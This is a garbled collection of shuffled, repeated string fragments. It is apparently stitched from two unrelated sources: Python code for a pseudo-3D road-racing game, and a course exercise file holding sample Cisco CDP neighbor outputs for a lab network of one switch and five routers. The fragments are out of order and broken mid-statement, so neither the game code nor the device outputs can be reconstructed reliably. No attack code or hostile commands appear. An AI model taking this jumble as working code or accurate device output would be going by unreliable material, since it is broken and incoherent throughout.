y1+a], [x2, y2+a],", "0.0) # for hills yw1 = seg['p1']['world'].get('y', 0.0) yw2 =", "xsr2, ys2, xsr4, ys4, xsr3, ys3, seg['color']['rumble']) def rd_seg_render__2_o(self): \"\"\"curve", "== self.pglc.KEYDOWN: di = self.key_to_di(event.key) if di is None: di", "= self.base_seg['sprites'] if not sprts: return # NOTE: we now", "is None: #n = seg_n / 20 n = seg_n", "['img_sprts/i_coin20.png'], 'score': 20,}, 'health': {'imgs': ['img_sprts/i_health.png'], 'score': 10,}, 'heart': {'imgs':", "x_i # x_i_saved = x_i obj.rect.top = 116 - y", "/ 2.0 * yp ys = h / 2.0 -", "self.tm_start else: self.tm_start = 0.0 #self.tm_end = 0.0 def update_bg(self):", "seg_scale * 8.0#10.0#2.0 obj = self.rd_sprts_render(seg, x_pos, x_i, y_sprt, scale_sprt)", "xc3 - x_curve - dx_curve xc4 = xc4 - x_curve", "zc2) xsl4 = self.xp_to_xs(xpl4, self.w) self.render_polygon(None, xs1, ys1, xsl1, ys1,", "'y': 897, 'w': 235, 'h': 118 }, 'BUSH2': { 'x':", "self.spd.rect.left = 602 #self.spd.rotate(180) self.disp_add(self.spd) def rdmap_hide(self): self.rdmap.hide() def rdmap_reset(self):", "self.pglc.K_f or k == self.pglc.K_j: return 0 elif k ==", "xs4, ys4, xs3, ys3, seg['color']['road']) def rd_seg_render__3_o(self): \"\"\"curve test 2:", "self.disp_add(self.scn1) road_file = kwargs.get('road_file') if road_file: self.scn1.straight.road_reset_from_file(segs_file=road_file) def main(): #sf", "pnts.append([x, y]) for seg in segs: curve = seg.get('curve', 0.0)", "0.0 self.sky_speed = 0.1#0.05# self.hill_speed = 0.2#0.1# self.tree_speed = 0.3#0.15#", "ys1, xsl3, ys3, xs3, ys3, seg['color']['rumble']) self.render_polygon(None, xs2, ys2, xsl2,", "(rad - xx3) - self.player_x xc4 = (rad - xx4)", "[x4, y4+a], [x1, y1+a]] # reflect the y- d =", "ys4, xs3, ys3 print '-' * 30 ''' # grass", "self.xp = 0.0 self.yp = 0.0 self.xs = 0.0 self.ys", "\\ self.player_x > self.road_w / 2: if self.score > 0:", "yc = self.camera_h print '=' * 80 print 'self.position', self.position", "= -1100 #print 'sprt_x', sprt_x #print 'car_x', car_x #print 'car_w',", "== 0: #if n % 4 == 0: c =", "hold, leave, curve, yw=0.0): #print enter, hold, leave, curve, yw", "else: seg_c = {} for k, v in seg.items(): if", "xcr4 = -self.lane_w - self.player_x yc = self.camera_h print '='", "self.seg_len) dx_curve = - (b_curve * b_percent) x_curve = 0", "# TODO: <1> if not obj: obj = FPSptRdSprts.create_by_img(FP_ROAD_SPRTS[sprt][0]) info['obj']", "trees.rect.width * 2 if trees.rect.left - trees.rect.width > 0: trees.rect.left", "num, 0, height/2.0) self.add_road(num, num, num, 0, 0) def rd_seg_get_cleared(self,", "sprt_at < (car_x + w_half): self.score += scr def check_tm(self):", "cv_s = 0 cv_l = 0.0 else: rad_m = 0.5#1.0#0.1#" ]
[ "881 Fas 1 R4 Fas 0/14 173 R S I", "Device ID Local Intrfce Holdtme Capability Platform Port ID SW1", "- Repeater Device ID Local Intrfce Holdtme Capability Platform Port", "Entry address(es): IP address: 10.1.1.4 Platform: Cisco 881, Capabilities: Router", "- IGMP, r - Repeater, P - Phone Device ID", "address(es): IP address: 10.1.1.22 Platform: cisco WS-C2950-24, Capabilities: Switch IGMP", "Repeater Device ID Local Intrfce Holdtme Capability Platform Port ID", "15.0(1)M4, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2010", "Capabilities: Router Switch IGMP Interface: FastEthernet0/11, Port ID (outgoing port):", "neighbors Capability Codes: R - Router, T - Trans Bridge,", "ID Local Intrfce Holdtme Capability Platform Port ID SW1 Fas", "0/15 144 R S I 881 Fas 1 ''' sw1_show_cdp_neighbors_detail", "IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/11 Holdtime :", "173 R S I 881 Fas 1 R5 Fas 0/15", "Device ID: R3 Entry address(es): IP address: 10.1.1.3 Platform: Cisco", "<reponame>laetrid/learning<filename>First_course/test5_base.py #!/usr/bin/env python sw1_show_cdp_neighbors = ''' SW1>show cdp neighbors Capability", "port): FastEthernet0/11 Holdtime : 145 sec Version : Cisco Internetwork", "Software (C2950-I6Q4L2-M), Version 12.1(22)EA8a, RELEASE SOFTWARE (fc1) Copyright (c) 1986-2006", "10.1.1.22 Platform: cisco WS-C2950-24, Capabilities: Switch IGMP Interface: FastEthernet1, Port", "(C880DATA-UNIVERSALK9-M), Version 15.0(1)M4, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright", "FastEthernet0/12 Holdtime : 145 sec Version : Cisco Internetwork Operating", "port): FastEthernet1 Holdtime: 144 sec Version : Cisco IOS Software,", "Switch IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/14 Holdtime", "Platform Port ID SW1 Fas 1 150 S I WS-C2950-", "- Repeater, P - Phone Device ID Local Intrfce Holdtme", "Router, T - Trans Bridge, B - Source Route Bridge", "129 sec Version : Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M),", "-------------------------- Device ID: R1 Entry address(es): IP address: 10.1.1.1 Platform:", "Platform: Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/13, Port", "Version : Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M), Version 15.0(1)M4,", "145 sec Version : Cisco Internetwork Operating System Software IOS", "IP address: 10.1.1.5 Platform: Cisco 881, Capabilities: Router Switch IGMP", "VTP Management Domain: '' Native VLAN: 1 Duplex: full Management", "VLAN: 1 Duplex: full ''' r3_show_cdp_neighbors = ''' R3>show cdp", "Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/12, Port ID", "12.1(22)EA8a, RELEASE SOFTWARE (fc1) Copyright (c) 1986-2006 by cisco Systems,", "by Cisco Systems, Inc. Compiled Fri 29-Oct-10 00:02 by prod_rel_team", "ID: R5 Entry address(es): IP address: 10.1.1.5 Platform: Cisco 881,", "123 R S I 881 Fas 1 R3 Fas 0/13", "System Software IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA8a, RELEASE", "r - Repeater Device ID Local Intrfce Holdtme Capability Platform", "Copyright (c) 1986-2006 by cisco Systems, Inc. Compiled Fri 28-Jul-06", "FastEthernet0/15, Port ID (outgoing port): FastEthernet1 Holdtime: 144 sec Version", "= ''' SW1> show cdp neighbors detail -------------------------- Device ID:", "VLAN: 1 Duplex: full ''' r5_show_cdp_neighbors = ''' R5>show cdp", "FastEthernet0/11, Port ID (outgoing port): FastEthernet1 Holdtime: 153 sec Version", "ID SW1 Fas 1 150 S I WS-C2950- Fas 0/12", "Native VLAN: 1 Duplex: full Management address(es): -------------------------- Device ID:", "detail ------------------------- Device ID: SW1 Entry address(es): IP address: 10.1.1.22", "IP address: 10.1.1.3 Platform: Cisco 881, Capabilities: Router Switch IGMP", ": Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M), Version 15.0(1)M4, RELEASE", "Local Intrfce Holdtme Capability Platform Port ID SW1 Fas 1", "ID (outgoing port): FastEthernet1 Holdtime: 123 sec Version : Cisco", "28-Jul-06 15:16 by weiliu advertisement version: 2 Protocol Hello: OUI=0x00000C,", "cdp neighbors detail ------------------------- Device ID: SW1 Entry address(es): IP", "Fas 0/11 ''' r1_show_cdp_neighbors_detail = ''' R1>show cdp neighbors detail", "Bridge S - Switch, H - Host, I - IGMP,", "IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/12 Holdtime :", "IGMP Interface: FastEthernet0/15, Port ID (outgoing port): FastEthernet1 Holdtime: 144", "IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/15 Holdtime :", "Native VLAN: 1 Duplex: full Management address(es): ''' r1_show_cdp_neighbors =", "H - Host, I - IGMP, r - Repeater Device", "2 VTP Management Domain: '' Native VLAN: 1 Duplex: full", "S I 881 Fas 1 ''' sw1_show_cdp_neighbors_detail = ''' SW1>", "= ''' SW1>show cdp neighbors Capability Codes: R - Router,", "R5>show cdp neighbors Capability Codes: R - Router, T -", "Holdtime: 129 sec Version : Cisco IOS Software, C880 Software", "(outgoing port): FastEthernet1 Holdtime: 129 sec Version : Cisco IOS", "881 Fas 1 R5 Fas 0/15 144 R S I", "r4_show_cdp_neighbors = ''' R4>show cdp neighbors Capability Codes: R -", "R5>show cdp neighbors detail ------------------------- Device ID: SW1 Entry address(es):", "S I WS-C2950- Fas 0/14 ''' r4_show_cdp_neighbors_detail = ''' R4>show", "Domain: '' Native VLAN: 1 Duplex: full ''' r2_show_cdp_neighbors =", "ID (outgoing port): FastEthernet0/13 Holdtime : 145 sec Version :", "R - Router, T - Trans Bridge, B - Source", "(tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA8a, RELEASE SOFTWARE (fc1) Copyright", "00:02 by prod_rel_team advertisement version: 2 VTP Management Domain: ''", "IGMP, r - Repeater, P - Phone Device ID Local", "Capabilities: Router Switch IGMP Interface: FastEthernet0/14, Port ID (outgoing port):", "R4 Entry address(es): IP address: 10.1.1.4 Platform: Cisco 881, Capabilities:", "R2 Entry address(es): IP address: 10.1.1.2 Platform: Cisco 881, Capabilities:", "''' sw1_show_cdp_neighbors_detail = ''' SW1> show cdp neighbors detail --------------------------", "R2 Fas 0/12 123 R S I 881 Fas 1", "Fas 1 150 S I WS-C2950- Fas 0/13 ''' r3_show_cdp_neighbors_detail", "Device ID: SW1 Entry address(es): IP address: 10.1.1.22 Platform: cisco", "Systems, Inc. Compiled Fri 28-Jul-06 15:16 by weiliu advertisement version:", "Route Bridge S - Switch, H - Host, I -", "Port ID SW1 Fas 1 150 S I WS-C2950- Fas", "FastEthernet1, Port ID (outgoing port): FastEthernet0/12 Holdtime : 145 sec", "(outgoing port): FastEthernet0/15 Holdtime : 145 sec Version : Cisco", "1 150 S I WS-C2950- Fas 0/14 ''' r4_show_cdp_neighbors_detail =", "Software (C880DATA-UNIVERSALK9-M), Version 15.0(1)M4, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport", "port): FastEthernet0/15 Holdtime : 145 sec Version : Cisco Internetwork", "Source Route Bridge S - Switch, H - Host, I", "Intrfce Holdtme Capability Platform Port ID SW1 Fas 1 150", "ID (outgoing port): FastEthernet1 Holdtime: 153 sec Version : Cisco", "FastEthernet1 Holdtime: 153 sec Version : Cisco IOS Software, C880", "r2_show_cdp_neighbors = ''' R2>show cdp neighbors Capability Codes: R -", "''' R4>show cdp neighbors Capability Codes: R - Router, T", "port): FastEthernet1 Holdtime: 123 sec Version : Cisco IOS Software,", "Fas 0/12 123 R S I 881 Fas 1 R3", "Protocol Hello: OUI=0x00000C, Protocol ID=0x0112; payload len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000 VTP Management", "R S I 881 Fas 1 R5 Fas 0/15 144", "Holdtime: 153 sec Version : Cisco IOS Software, C880 Software", "port): FastEthernet1 Holdtime: 153 sec Version : Cisco IOS Software,", "advertisement version: 2 VTP Management Domain: '' Native VLAN: 1", "''' R2>show cdp neighbors Capability Codes: R - Router, T", "Port ID (outgoing port): FastEthernet0/15 Holdtime : 145 sec Version", "''' R4>show cdp neighbors detail ------------------------- Device ID: SW1 Entry", "Copyright (c) 1986-2010 by Cisco Systems, Inc. Compiled Fri 29-Oct-10", "''' SW1> show cdp neighbors detail -------------------------- Device ID: R1", "ID (outgoing port): FastEthernet1 Holdtime: 144 sec Version : Cisco", "Holdtime: 144 sec Version : Cisco IOS Software, C880 Software", "Protocol ID=0x0112; payload len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000 VTP Management Domain: '' Native", "881 Fas 1 ''' sw1_show_cdp_neighbors_detail = ''' SW1> show cdp", "Compiled Fri 28-Jul-06 15:16 by weiliu advertisement version: 2 Protocol", "SW1>show cdp neighbors Capability Codes: R - Router, T -", "full ''' r3_show_cdp_neighbors = ''' R3>show cdp neighbors Capability Codes:", "Management Domain: '' Native VLAN: 1 Duplex: full ''' r5_show_cdp_neighbors", "10.1.1.4 Platform: Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/14,", "port): FastEthernet1 Holdtime: 129 sec Version : Cisco IOS Software,", "''' R5>show cdp neighbors Capability Codes: R - Router, T", "Software, C880 Software (C880DATA-UNIVERSALK9-M), Version 15.0(1)M4, RELEASE SOFTWARE (fc1) Technical", "Switch IGMP Interface: FastEthernet0/14, Port ID (outgoing port): FastEthernet1 Holdtime:", "port): FastEthernet0/13 Holdtime : 145 sec Version : Cisco Internetwork", "Fas 0/12 ''' r2_show_cdp_neighbors_detail = ''' R2>show cdp neighbors detail", "Phone Device ID Local Intrfce Holdtme Capability Platform Port ID", "Port ID (outgoing port): FastEthernet1 Holdtime: 123 sec Version :", "Port ID (outgoing port): FastEthernet1 Holdtime: 173 sec Version :", "Hello: OUI=0x00000C, Protocol ID=0x0112; payload len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000 VTP Management Domain:", "''' r3_show_cdp_neighbors_detail = ''' R3>show cdp neighbors detail ------------------------- Device", "Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/13 Holdtime : 145", "0/12 123 R S I 881 Fas 1 R3 Fas", "Domain: '' Native VLAN: 1 Duplex: full ''' r5_show_cdp_neighbors =", "FastEthernet0/15 Holdtime : 145 sec Version : Cisco Internetwork Operating", "10.1.1.5 Platform: Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/15,", "-------------------------- Device ID: R5 Entry address(es): IP address: 10.1.1.5 Platform:", "Switch IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/11 Holdtime", "Management Domain: '' Native VLAN: 1 Duplex: full Management address(es):", "Capabilities: Router Switch IGMP Interface: FastEthernet0/12, Port ID (outgoing port):", "r4_show_cdp_neighbors_detail = ''' R4>show cdp neighbors detail ------------------------- Device ID:", "(outgoing port): FastEthernet0/12 Holdtime : 145 sec Version : Cisco", "prod_rel_team advertisement version: 2 VTP Management Domain: '' Native VLAN:", "Interface: FastEthernet0/12, Port ID (outgoing port): FastEthernet1 Holdtime: 123 sec", "R3>show cdp neighbors Capability Codes: R - Router, T -", "Switch IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/13 Holdtime", "Fas 1 R3 Fas 0/13 129 R S I 881", "ID Local Intrfce Holdtme Capability Platform Port ID R1 Fas", "by prod_rel_team advertisement version: 2 VTP Management Domain: '' Native", "Management Domain: '' Native VLAN: 1 Duplex: full ''' r3_show_cdp_neighbors", "''' r2_show_cdp_neighbors = ''' R2>show cdp neighbors Capability Codes: R", "I - IGMP, r - Repeater, P - Phone Device", "Entry address(es): IP address: 10.1.1.1 Platform: Cisco 881, Capabilities: Router", "FastEthernet1 Holdtime: 129 sec Version : Cisco IOS Software, C880", "Management address(es): -------------------------- Device ID: R3 Entry address(es): IP address:", "Interface: FastEthernet0/14, Port ID (outgoing port): FastEthernet1 Holdtime: 173 sec", "Switch, H - Host, I - IGMP, r - Repeater", "''' r5_show_cdp_neighbors_detail = ''' R5>show cdp neighbors detail ------------------------- Device", "Switch IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/12 Holdtime", "- Phone Device ID Local Intrfce Holdtme Capability Platform Port", "C880 Software (C880DATA-UNIVERSALK9-M), Version 15.0(1)M4, RELEASE SOFTWARE (fc1) Technical Support:", "address(es): IP address: 10.1.1.5 Platform: Cisco 881, Capabilities: Router Switch", "(outgoing port): FastEthernet1 Holdtime: 123 sec Version : Cisco IOS", "FastEthernet1 Holdtime: 144 sec Version : Cisco IOS Software, C880", "Native VLAN: 1 Duplex: full ''' r5_show_cdp_neighbors = ''' R5>show", "Capabilities: Router Switch IGMP Interface: FastEthernet0/13, Port ID (outgoing port):", "- Trans Bridge, B - Source Route Bridge S -", "1 150 S I WS-C2950- Fas 0/13 ''' r3_show_cdp_neighbors_detail =", "Version : Cisco Internetwork Operating System Software IOS (tm) C2950", "Switch, H - Host, I - IGMP, r - Repeater,", "Holdtime: 123 sec Version : Cisco IOS Software, C880 Software", "= ''' R4>show cdp neighbors detail ------------------------- Device ID: SW1", "FastEthernet1, Port ID (outgoing port): FastEthernet0/14 Holdtime : 145 sec", "= ''' R5>show cdp neighbors detail ------------------------- Device ID: SW1", "R4 Fas 0/14 173 R S I 881 Fas 1", "H - Host, I - IGMP, r - Repeater, P", "-------------------------- Device ID: R4 Entry address(es): IP address: 10.1.1.4 Platform:", "ID SW1 Fas 1 150 S I WS-C2950- Fas 0/15", "ID (outgoing port): FastEthernet1 Holdtime: 129 sec Version : Cisco", "C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA8a, RELEASE SOFTWARE (fc1) Copyright (c)", "full Management address(es): -------------------------- Device ID: R4 Entry address(es): IP", "Platform: cisco WS-C2950-24, Capabilities: Switch IGMP Interface: FastEthernet1, Port ID", "R S I 881 Fas 1 R2 Fas 0/12 123", "-------------------------- Device ID: R2 Entry address(es): IP address: 10.1.1.2 Platform:", "sw1_show_cdp_neighbors = ''' SW1>show cdp neighbors Capability Codes: R -", "Interface: FastEthernet0/11, Port ID (outgoing port): FastEthernet1 Holdtime: 153 sec", "''' R3>show cdp neighbors detail ------------------------- Device ID: SW1 Entry", "P - Phone Device ID Local Intrfce Holdtme Capability Platform", "Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/11, Port ID", "(outgoing port): FastEthernet1 Holdtime: 144 sec Version : Cisco IOS", "Interface: FastEthernet0/13, Port ID (outgoing port): FastEthernet1 Holdtime: 129 sec", "ID SW1 Fas 1 150 S I WS-C2950- Fas 0/13", "S I 881 Fas 1 R2 Fas 0/12 123 R", "python sw1_show_cdp_neighbors = ''' SW1>show cdp neighbors Capability Codes: R", "address: 10.1.1.1 Platform: Cisco 881, Capabilities: Router Switch IGMP Interface:", "I 881 Fas 1 R2 Fas 0/12 123 R S", "Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/11 Holdtime : 145", "(C2950-I6Q4L2-M), Version 12.1(22)EA8a, RELEASE SOFTWARE (fc1) Copyright (c) 1986-2006 by", "881, Capabilities: Router Switch IGMP Interface: FastEthernet0/15, Port ID (outgoing", "Domain: '' Native VLAN: 1 Duplex: full ''' r4_show_cdp_neighbors =", "Capabilities: Switch IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/11", "Interface: FastEthernet0/15, Port ID (outgoing port): FastEthernet1 Holdtime: 144 sec", "VLAN: 1 Duplex: full Management address(es): -------------------------- Device ID: R5", "Native VLAN: 1 Duplex: full ''' r2_show_cdp_neighbors = ''' R2>show", "r5_show_cdp_neighbors = ''' R5>show cdp neighbors Capability Codes: R -", "Cisco Internetwork Operating System Software IOS (tm) C2950 Software (C2950-I6Q4L2-M),", "- Host, I - IGMP, r - Repeater, P -", "VLAN: 1 Duplex: full ''' r2_show_cdp_neighbors = ''' R2>show cdp", "Capabilities: Switch IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/13", "Holdtime : 145 sec Version : Cisco Internetwork Operating System", "Capability Platform Port ID R1 Fas 0/11 153 R S", "Port ID (outgoing port): FastEthernet0/11 Holdtime : 145 sec Version", "SW1 Fas 1 150 S I WS-C2950- Fas 0/14 '''", "SW1 Entry address(es): IP address: 10.1.1.22 Platform: cisco WS-C2950-24, Capabilities:", "Internetwork Operating System Software IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version", "sec Version : Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M), Version", "R3 Fas 0/13 129 R S I 881 Fas 1", "address(es): IP address: 10.1.1.1 Platform: Cisco 881, Capabilities: Router Switch", "show cdp neighbors detail -------------------------- Device ID: R1 Entry address(es):", "detail -------------------------- Device ID: R1 Entry address(es): IP address: 10.1.1.1", "value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000 VTP Management Domain: '' Native VLAN: 1 Duplex: full", "881 Fas 1 R2 Fas 0/12 123 R S I", "IOS Software, C880 Software (C880DATA-UNIVERSALK9-M), Version 15.0(1)M4, RELEASE SOFTWARE (fc1)", "IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/14 Holdtime :", "IP address: 10.1.1.22 Platform: cisco WS-C2950-24, Capabilities: Switch IGMP Interface:", "Switch IGMP Interface: FastEthernet0/13, Port ID (outgoing port): FastEthernet1 Holdtime:", "Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/14, Port ID", "Domain: '' Native VLAN: 1 Duplex: full Management address(es): --------------------------", "(fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2010 by Cisco Systems,", "R1>show cdp neighbors Capability Codes: R - Router, T -", "S - Switch, H - Host, I - IGMP, r", "sw1_show_cdp_neighbors_detail = ''' SW1> show cdp neighbors detail -------------------------- Device", "version: 2 Protocol Hello: OUI=0x00000C, Protocol ID=0x0112; payload len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000", "0/11 153 R S I 881 Fas 1 R2 Fas", "Capabilities: Switch IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/14", "WS-C2950-24, Capabilities: Switch IGMP Interface: FastEthernet1, Port ID (outgoing port):", "cisco Systems, Inc. Compiled Fri 28-Jul-06 15:16 by weiliu advertisement", "''' R5>show cdp neighbors detail ------------------------- Device ID: SW1 Entry", "Fas 1 R4 Fas 0/14 173 R S I 881", "Device ID: R2 Entry address(es): IP address: 10.1.1.2 Platform: Cisco", "1 Duplex: full ''' r2_show_cdp_neighbors = ''' R2>show cdp neighbors", "153 sec Version : Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M),", "R3 Entry address(es): IP address: 10.1.1.3 Platform: Cisco 881, Capabilities:", "Fas 0/11 153 R S I 881 Fas 1 R2", "- Source Route Bridge S - Switch, H - Host,", "S I 881 Fas 1 R3 Fas 0/13 129 R", "''' R1>show cdp neighbors detail ------------------------- Device ID: SW1 Entry", "881 Fas 1 R3 Fas 0/13 129 R S I", "Management Domain: '' Native VLAN: 1 Duplex: full ''' r4_show_cdp_neighbors", "address(es): IP address: 10.1.1.2 Platform: Cisco 881, Capabilities: Router Switch", "address(es): -------------------------- Device ID: R4 Entry address(es): IP address: 10.1.1.4", "1 R5 Fas 0/15 144 R S I 881 Fas", "1 Duplex: full Management address(es): ''' r1_show_cdp_neighbors = ''' R1>show", "Duplex: full Management address(es): -------------------------- Device ID: R3 Entry address(es):", "Management Domain: '' Native VLAN: 1 Duplex: full ''' r2_show_cdp_neighbors", "RELEASE SOFTWARE (fc1) Copyright (c) 1986-2006 by cisco Systems, Inc.", "payload len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000 VTP Management Domain: '' Native VLAN: 1", "150 S I WS-C2950- Fas 0/13 ''' r3_show_cdp_neighbors_detail = '''", "ID (outgoing port): FastEthernet0/11 Holdtime : 145 sec Version :", "= ''' R3>show cdp neighbors detail ------------------------- Device ID: SW1", "Fas 0/13 ''' r3_show_cdp_neighbors_detail = ''' R3>show cdp neighbors detail", "1 Duplex: full Management address(es): -------------------------- Device ID: R2 Entry", "WS-C2950- Fas 0/14 ''' r4_show_cdp_neighbors_detail = ''' R4>show cdp neighbors", "129 R S I 881 Fas 1 R4 Fas 0/14", "173 sec Version : Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M),", "Switch IGMP Interface: FastEthernet0/12, Port ID (outgoing port): FastEthernet1 Holdtime:", "Management address(es): -------------------------- Device ID: R4 Entry address(es): IP address:", "r - Repeater, P - Phone Device ID Local Intrfce", "Device ID: R4 Entry address(es): IP address: 10.1.1.4 Platform: Cisco", "Operating System Software IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA8a,", "''' r3_show_cdp_neighbors = ''' R3>show cdp neighbors Capability Codes: R", "FastEthernet0/14 Holdtime : 145 sec Version : Cisco Internetwork Operating", "B - Source Route Bridge S - Switch, H -", "Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/15, Port ID", "FastEthernet0/13, Port ID (outgoing port): FastEthernet1 Holdtime: 129 sec Version", "ID: SW1 Entry address(es): IP address: 10.1.1.22 Platform: cisco WS-C2950-24,", "1 Duplex: full Management address(es): -------------------------- Device ID: R4 Entry", "15:16 by weiliu advertisement version: 2 Protocol Hello: OUI=0x00000C, Protocol", "1986-2006 by cisco Systems, Inc. Compiled Fri 28-Jul-06 15:16 by", "Switch IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/15 Holdtime", "Support: http://www.cisco.com/techsupport Copyright (c) 1986-2010 by Cisco Systems, Inc. Compiled", "FastEthernet0/14, Port ID (outgoing port): FastEthernet1 Holdtime: 173 sec Version", "Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2010 by Cisco Systems, Inc.", "Entry address(es): IP address: 10.1.1.5 Platform: Cisco 881, Capabilities: Router", "1 150 S I WS-C2950- Fas 0/11 ''' r1_show_cdp_neighbors_detail =", "Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M), Version 15.0(1)M4, RELEASE SOFTWARE", "r5_show_cdp_neighbors_detail = ''' R5>show cdp neighbors detail ------------------------- Device ID:", "Codes: R - Router, T - Trans Bridge, B -", "'' Native VLAN: 1 Duplex: full ''' r4_show_cdp_neighbors = '''", "IGMP Interface: FastEthernet0/14, Port ID (outgoing port): FastEthernet1 Holdtime: 173", "Fas 1 150 S I WS-C2950- Fas 0/14 ''' r4_show_cdp_neighbors_detail", "10.1.1.3 Platform: Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/13,", "Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/14 Holdtime : 145", "Capability Platform Port ID SW1 Fas 1 150 S I", "(outgoing port): FastEthernet0/14 Holdtime : 145 sec Version : Cisco", "R1 Fas 0/11 153 R S I 881 Fas 1", "ID (outgoing port): FastEthernet1 Holdtime: 173 sec Version : Cisco", "''' R3>show cdp neighbors Capability Codes: R - Router, T", "153 R S I 881 Fas 1 R2 Fas 0/12", "SOFTWARE (fc1) Copyright (c) 1986-2006 by cisco Systems, Inc. Compiled", "29-Oct-10 00:02 by prod_rel_team advertisement version: 2 VTP Management Domain:", "Platform: Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/12, Port", "R2>show cdp neighbors detail ------------------------- Device ID: SW1 Entry address(es):", "R5 Fas 0/15 144 R S I 881 Fas 1", "VLAN: 1 Duplex: full ''' r4_show_cdp_neighbors = ''' R4>show cdp", "1 Duplex: full Management address(es): -------------------------- Device ID: R5 Entry", "(c) 1986-2006 by cisco Systems, Inc. Compiled Fri 28-Jul-06 15:16", "http://www.cisco.com/techsupport Copyright (c) 1986-2010 by Cisco Systems, Inc. Compiled Fri", "2 Protocol Hello: OUI=0x00000C, Protocol ID=0x0112; payload len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000 VTP", "ID=0x0112; payload len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000 VTP Management Domain: '' Native VLAN:", "Entry address(es): IP address: 10.1.1.3 Platform: Cisco 881, Capabilities: Router", "S I WS-C2950- Fas 0/15 ''' r5_show_cdp_neighbors_detail = ''' R5>show", "full ''' r4_show_cdp_neighbors = ''' R4>show cdp neighbors Capability Codes:", "Systems, Inc. Compiled Fri 29-Oct-10 00:02 by prod_rel_team advertisement version:", "0/14 ''' r4_show_cdp_neighbors_detail = ''' R4>show cdp neighbors detail -------------------------", "r3_show_cdp_neighbors = ''' R3>show cdp neighbors Capability Codes: R -", "Fas 0/14 173 R S I 881 Fas 1 R5", "S I 881 Fas 1 R4 Fas 0/14 173 R", "by weiliu advertisement version: 2 Protocol Hello: OUI=0x00000C, Protocol ID=0x0112;", "Fri 29-Oct-10 00:02 by prod_rel_team advertisement version: 2 VTP Management", "I WS-C2950- Fas 0/14 ''' r4_show_cdp_neighbors_detail = ''' R4>show cdp", "WS-C2950- Fas 0/13 ''' r3_show_cdp_neighbors_detail = ''' R3>show cdp neighbors", "Inc. Compiled Fri 29-Oct-10 00:02 by prod_rel_team advertisement version: 2", "Fas 1 150 S I WS-C2950- Fas 0/11 ''' r1_show_cdp_neighbors_detail", "r1_show_cdp_neighbors_detail = ''' R1>show cdp neighbors detail ------------------------- Device ID:", "''' r4_show_cdp_neighbors = ''' R4>show cdp neighbors Capability Codes: R", "R5 Entry address(es): IP address: 10.1.1.5 Platform: Cisco 881, Capabilities:", "0/13 129 R S I 881 Fas 1 R4 Fas", "address(es): IP address: 10.1.1.4 Platform: Cisco 881, Capabilities: Router Switch", "Port ID R1 Fas 0/11 153 R S I 881", "ID (outgoing port): FastEthernet0/14 Holdtime : 145 sec Version :", "Capabilities: Switch IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/12", "R3>show cdp neighbors detail ------------------------- Device ID: SW1 Entry address(es):", "Entry address(es): IP address: 10.1.1.2 Platform: Cisco 881, Capabilities: Router", ": Cisco Internetwork Operating System Software IOS (tm) C2950 Software", "Capabilities: Switch IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/15", "''' R2>show cdp neighbors detail ------------------------- Device ID: SW1 Entry", "cisco WS-C2950-24, Capabilities: Switch IGMP Interface: FastEthernet1, Port ID (outgoing", "FastEthernet0/11 Holdtime : 145 sec Version : Cisco Internetwork Operating", "ID: R4 Entry address(es): IP address: 10.1.1.4 Platform: Cisco 881,", "Fas 1 ''' sw1_show_cdp_neighbors_detail = ''' SW1> show cdp neighbors", "1 R4 Fas 0/14 173 R S I 881 Fas", "SW1 Fas 1 150 S I WS-C2950- Fas 0/11 '''", "Native VLAN: 1 Duplex: full ''' 